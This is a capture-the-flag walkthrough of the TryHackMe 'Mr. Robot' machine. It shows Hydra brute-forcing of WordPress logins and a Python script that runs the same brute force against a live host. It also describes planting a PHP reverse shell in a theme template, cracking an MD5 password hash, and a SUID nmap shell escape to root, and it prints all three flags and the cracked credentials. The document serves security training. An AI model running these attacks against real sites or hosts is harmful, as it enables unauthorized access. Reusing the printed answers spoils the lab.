
TryHackMe: Mr. Robot — Full Walkthrough

Overview

Mr. Robot is a TryHackMe machine inspired by the TV show. It involves web enumeration, WordPress exploitation, and Linux privilege escalation via SUID binaries. Three flags (keys) are hidden across the system.

Recon

Starting with an Nmap scan to identify open ports and services:

nmap -sC -sV -oN nmap/mrrobot 10.10.x.x

Results revealed ports 80 (HTTP) and 443 (HTTPS) open, both running Apache. SSH was filtered.

Enumeration

Visiting the web server showed an interactive terminal inspired by the TV show. Running Gobuster to enumerate hidden directories:

gobuster dir -u http://10.10.x.x -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt

Key findings:

  • /robots.txt — contained two entries: fsocity.dic (a wordlist) and key-1-of-3.txt
  • /wp-login.php — confirmed WordPress installation
  • /license — contained a Base64-encoded string

Flag 1: Found at /key-1-of-3.txt: 073403c8a58a1f80d943455fb30724b9

The fsocity.dic file was a massive wordlist with duplicates. After deduplication:

sort fsocity.dic | uniq > fsocity_clean.dic

Reduced from 858,160 to 11,451 entries.

Exploitation

WordPress Username Enumeration

The WordPress login form returns different error messages for an unknown username ("Invalid username") and for a wrong password on a valid account ("The password you entered for the username ... is incorrect"), so the error text works as a username oracle. Hydra's http-post-form module treats the string after the last colon as the failure condition: any response that does not contain it is reported as a hit. Used Hydra with the cleaned wordlist as the username list and a fixed dummy password to enumerate the username:

hydra -L fsocity_clean.dic -p test 10.10.x.x http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:Invalid username"

Found username: elliot

Password Brute Force

hydra -l elliot -P fsocity_clean.dic 10.10.x.x http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:The password you entered"

Found password: ER28-0652
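Both Hydra runs above depend on the same oracle: the text of the login error says whether the username exists, and the absence of any error (WordPress redirects to wp-admin/) says the password is right. The following is an added example, not code from the original write-up, that spells that logic out in Python so it can be checked offline: classify() maps one response to a verdict, the two loops mirror the -L/-p and -l/-P phases, and fake_wordpress() is a constructed stand-in for the target. The exact error strings, the redirect-on-success behaviour and the 10.10.x.x base URL are assumptions about the target rather than facts from the page; confirm them with one manual request before a real run.

```python
import urllib.error
import urllib.parse
import urllib.request

# Error strings of the classic wp-login.php (assumed for this target; newer
# WordPress releases reworded them, so verify with one manual probe first).
INVALID_USER = "Invalid username"
BAD_PASSWORD = "The password you entered"


def classify(status, body):
    """Turn one wp-login.php response into an oracle verdict."""
    if status in (301, 302):
        return "success"        # WordPress redirects to wp-admin/ after a valid login
    if INVALID_USER in body:
        return "no_such_user"
    if BAD_PASSWORD in body:
        return "valid_user"     # account exists, password wrong: the enumeration signal
    return "unknown"            # lockout page, CAPTCHA, WAF block, 5xx: do not guess


def wp_login_post(base_url, username, password, timeout=10):
    """Live transport: POST the login form without following redirects."""
    data = urllib.parse.urlencode(
        {"log": username, "pwd": password, "wp-submit": "Log In"}).encode()
    req = urllib.request.Request(base_url.rstrip("/") + "/wp-login.php", data=data)

    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, *args, **kwargs):
            return None         # surface 30x as HTTPError instead of following it

    try:
        with urllib.request.build_opener(NoRedirect).open(req, timeout=timeout) as r:
            return r.getcode(), r.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode(errors="replace")


def unique(words):
    """Deduplicate while keeping order (fsocity.dic is mostly repeats)."""
    seen = set()
    for w in words:
        w = w.strip()
        if w and w not in seen:
            seen.add(w)
            yield w


def enumerate_users(candidates, post, probe_password="test"):
    """Phase 1 (hydra -L list -p test): keep every name the oracle does not
    reject as 'Invalid username'. Ambiguous responses are returned separately
    rather than dropped, so a lockout cannot silently hide a hit."""
    found, unclear = [], []
    for name in unique(candidates):
        verdict = classify(*post(name, probe_password))
        if verdict in ("valid_user", "success"):
            found.append(name)
        elif verdict == "unknown":
            unclear.append(name)
    return found, unclear


def brute_force_password(username, candidates, post):
    """Phase 2 (hydra -l user -P list): first password that yields 'success'."""
    for pw in unique(candidates):
        verdict = classify(*post(username, pw))
        if verdict == "success":
            return pw
        if verdict == "unknown":
            raise RuntimeError(f"unexpected response for {pw!r}; inspect before continuing")
    return None


def fake_wordpress(accounts):
    """Constructed stand-in for the target, not real traffic: `accounts` maps
    usernames to passwords and the responses mimic the classic wp-login.php."""
    def post(user, pw):
        if user not in accounts:
            return 200, '<div id="login_error"><strong>ERROR</strong>: Invalid username.</div>'
        if accounts[user] != pw:
            return 200, ('<div id="login_error"><strong>ERROR</strong>: The password you '
                         f'entered for the username <strong>{user}</strong> is incorrect.</div>')
        return 302, ""          # Location: /wp-admin/
    return post


if __name__ == "__main__":
    # Offline demo against the fake; for a live host use
    # lambda u, p: wp_login_post("http://10.10.x.x", u, p) as the transport.
    target = fake_wordpress({"elliot": "ER28-0652"})
    users, unclear = enumerate_users(["Elliot", "mrrobot", "elliot", "elliot"], target)
    print("users:", users, "unclear:", unclear)
    print("password:", brute_force_password(users[0], ["abc123", "ER28-0652"], target))
```

The "unknown" bucket is the part Hydra's single failure string hides: a lockout plugin or WAF that starts answering with a different page after a few attempts would make every remaining candidate look like a hit, so the enumeration loop reports such names separately and the password loop stops outright.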

Reverse Shell

Logged into the WordPress admin panel and, through the theme editor (Appearance > Editor), replaced the contents of the active theme's 404.php template with a PHP reverse shell pointing at the attacking machine. Set up a listener:

nc -lvnp 4444

Triggered the shell by requesting a page that does not exist, which makes WordPress render the edited 404 template. Got a shell as the daemon user, the account Apache runs under on this box.

Privilege Escalation

Found /home/robot/key-2-of-3.txt, readable only by user robot. In the same directory, password.raw-md5 was readable and contained the MD5 hash of robot's password.

echo "c3fcd3d76192e4007dfb496cca67e13b" > hash.txt
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Cracked password: abcdefghijklmnopqrstuvwxyz

Switched to user robot. Note that su refuses to run without a terminal; if the bare netcat shell answers "must be run from a terminal", upgrade it to a full TTY first (for example by spawning a pty with Python) and then switch:

su robot
cat /home/robot/key-2-of-3.txt

Flag 2: 822c73956184f694993bede3eb39f959

Root via SUID

Searched for SUID binaries:

find / -perm -4000 -type f 2>/dev/null

Found /usr/local/bin/nmap with the SUID bit set, which is not a standard install location. Nmap versions 2.02 to 5.21 have an interactive mode in which a command prefixed with ! is run through a shell; because the binary runs with root's effective UID, that shell is root. Use sh rather than bash here: bash drops a mismatched effective UID unless started with -p.

nmap --interactive
!sh
whoami  # root
cat /root/key-3-of-3.txt

Flag 3: 04787ddef27c3dee1ee161b21670b4e4
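The find command lists every SUID file, and the work is deciding which ones matter. As an added example that is not part of the original write-up, the following Python reproduces the find output and sorts it into three buckets: binaries with a documented shell escape, standard SUID binaries in standard locations, and everything else that needs a manual look. KNOWN_ESCAPES is an illustrative subset of GTFOBins' SUID entries assumed here, not an exhaustive list; the /usr/local/bin/nmap path is the one from this box.

```python
import os
import stat

# Illustrative subset of binaries with documented SUID shell escapes
# (GTFOBins "SUID" entries, e.g. nmap --interactive then !sh, find -exec,
# vim :!sh, bash -p). Assumed and not exhaustive: unmatched files still
# need a look by hand.
KNOWN_ESCAPES = {"nmap", "find", "vim", "vi", "bash", "python", "python2",
                 "python3", "perl", "env", "less", "more", "awk", "cp", "tar"}

# SUID binaries a typical Linux install ships with; only "expected" when
# they live in a standard directory (a SUID "sudo" in /tmp is not).
EXPECTED = {"sudo", "su", "passwd", "mount", "umount", "ping", "ping6",
            "chsh", "chfn", "newgrp", "gpasswd", "fusermount"}
STANDARD_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/")
SKIP_TREES = ("/proc", "/sys", "/dev", "/run")


def _skip(dirpath):
    return any(dirpath == t or dirpath.startswith(t + "/") for t in SKIP_TREES)


def find_suid(root="/"):
    """Python equivalent of `find / -perm -4000 -type f 2>/dev/null`:
    yield (path, mode) for every regular file with the setuid bit."""
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        if _skip(dirpath):
            dirnames[:] = []        # do not descend into pseudo-filesystems
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: a symlink's own bits are irrelevant
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st.st_mode


def triage(entries):
    """Sort (path, mode) pairs into escape / expected / review buckets."""
    buckets = {"escape": [], "expected": [], "review": []}
    for path, mode in entries:
        if not mode & stat.S_ISUID:
            continue                            # not SUID: ignore
        base = os.path.basename(path)
        if base in KNOWN_ESCAPES:
            buckets["escape"].append(path)      # e.g. /usr/local/bin/nmap on this box
        elif base in EXPECTED and path.startswith(STANDARD_DIRS):
            buckets["expected"].append(path)
        else:
            buckets["review"].append(path)      # custom tool or odd location: inspect
    return {k: sorted(v) for k, v in buckets.items()}


if __name__ == "__main__":
    for bucket, paths in triage(find_suid("/")).items():
        print(f"[{bucket}]")
        for p in paths:
            print("  ", p)
```

A hit in the escape bucket still has to be confirmed against the version on the box: nmap's interactive mode exists only up to 5.21, so run the binary with --version before assuming the !sh trick applies.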

Flags

All three keys captured:

  1. 073403c8a58a1f80d943455fb30724b9
  2. 822c73956184f694993bede3eb39f959
  3. 04787ddef27c3dee1ee161b21670b4e4